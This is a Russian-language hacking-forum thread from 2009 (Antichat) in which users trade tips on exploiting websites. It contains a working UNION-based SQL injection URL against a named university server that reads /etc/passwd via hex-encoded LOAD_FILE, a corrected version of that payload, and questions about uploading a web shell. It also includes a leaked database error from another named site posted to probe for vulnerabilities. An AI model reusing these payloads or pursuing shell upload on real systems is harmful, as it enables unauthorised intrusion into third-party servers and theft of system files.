Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
06.07.2009, 19:08
|
|
Познающий
Регистрация: 12.06.2008
Сообщений: 32
Провел на форуме:
324402
Репутация:
22
|
|
Если работает LOAD_FILE или INTO DumPFILE то раскрытие пути нужно для определения дирректории..а иначе они бесполезны.
|
|
|
06.07.2009, 19:11
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Раскрытие путей никогда не бывает бесполезным. Есть еще реверс ip и вообще, любая информация - информация. Надо просто уметь ей распорядиться
|
|
|
|
06.07.2009, 19:22
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
Pashkela бывает бесполезный. Как и скуля бывает беспалезная, и инклуд
|
|
|
|
06.07.2009, 19:38
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Не думаю. Я все такие вещи складирую. Сегодня не пригодилась - завтра обязательно пригодится. Или послезавтра. Имхо.
|
|
|
|
06.07.2009, 21:29
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
Кто, что может подсказать (статьи, топики и т.д.) для выгодного использования одинакового ИП адреса нескольких ресурсов (один хостер)?
Интересно узнать все подробности для выгоды хакеру)
|
|
|
|
06.07.2009, 23:33
|
|
Участник форума
Регистрация: 02.11.2008
Сообщений: 222
Провел на форуме:
3459722
Репутация:
155
|
|
вот на сайтец левый наткнулся.Дак он выдает странную ошибку,сайт должен быть посвящен японским часам.вот ссыль _ttp://urbanjunkie.ru/
Выдаёт ошибку странного содержания :
PHP код:
SQL Error: Access denied for user 'u28586'@'localhost' (using password: YES) at /var/www/vhosts/urbanjunkie.ru/httpdocs/inc/dbconfig.inc line 4
Array
(
[code] => 1045
[message] => Access denied for user 'u28586'@'localhost' (using password: YES)
[query] => mysql_connect()
[context] => /var/www/vhosts/urbanjunkie.ru/httpdocs/inc/dbconfig.inc line 4
)
Мне нече не надо,просто может уязвимость какая на нём. |
|
|
|
07.07.2009, 00:38
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от Велемир
Люди,что означает это ?
credit_card:x:1301:1001::/home/card:/usr/bin/passwd
/usr/bin/passwd не шелл же?))У других стоит но логин(нету то бишь),а у других норм - башик...
Никто не ответил =(.Ещё вопрос: почему в файле /etc/passwd стоит хэш пароля?))
Версия Апача - 1.3.27
|
|
|
|
07.07.2009, 00:43
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+concat_ws(0x3a, LOAD_FILE(0x2f6574632f706173737764)),2,3,4,5+limit +1,1/*
вто инъекция под рутом.
Вопрос 1. Почему не работает вот так а) (/etc/passwd) b) ('/etc/passwd')
вопрос 2. Возможно ли залить шелл туда?
Извиняюсь за нубский вопрос, но прошу помощи плиз.
|
|
|
|
07.07.2009, 00:46
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
1.magic_quotes_gpc,addslashes или ещё что-нибудь.
2.Зачем ты юзаешь concat_ws() ? Убери всё и сделай так:
http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+LOAD_FILE(0x2f6 574632f706173737764)/*
|
|
|
|
07.07.2009, 00:48
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Сообщение от Велемир
1.magic_quotes_gpc,addslashes или ещё что-нибудь.
2.Зачем ты юзаешь concat_ws() ? Убери всё и сделай так:
http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+LOAD_FILE(0x2f6 574632f706173737764)/*
Есть ли при таких абстоятельсвах возможность залить шелл?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
